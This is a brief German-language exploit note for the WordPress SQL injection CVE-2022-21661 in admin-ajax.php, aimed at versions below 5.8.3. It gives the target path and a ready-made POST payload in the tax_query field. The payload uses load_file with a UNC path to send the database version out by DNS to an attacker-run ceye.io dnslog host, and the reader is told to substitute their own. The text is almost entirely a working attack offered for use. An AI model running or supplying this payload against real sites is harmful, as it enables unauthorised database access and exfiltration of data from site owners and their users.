
Exploit für WordPress CVE-2022-21661 SQL-Injection-Schwachstelle in admin-ajax.php, unter Verwendung von Out-of-Band-Datenextfiltration über DNS für Versionen unter 5.8.3.
#version<5.8.3
Pfad:http://your target/wp-admin/admin-ajax.php
Der Injection-Typ ist Out-of-Band. Du musst selbst ein dnslog angeben und ceye.io ersetzen.
POST-DATEN:{"tax_query":[{"field":"term_taxonomy_id","terms":["1) and if((select load_file(concat('\\',(select version()),'.27s601.ceye.io\abc'))),1,1)-- a"]}]}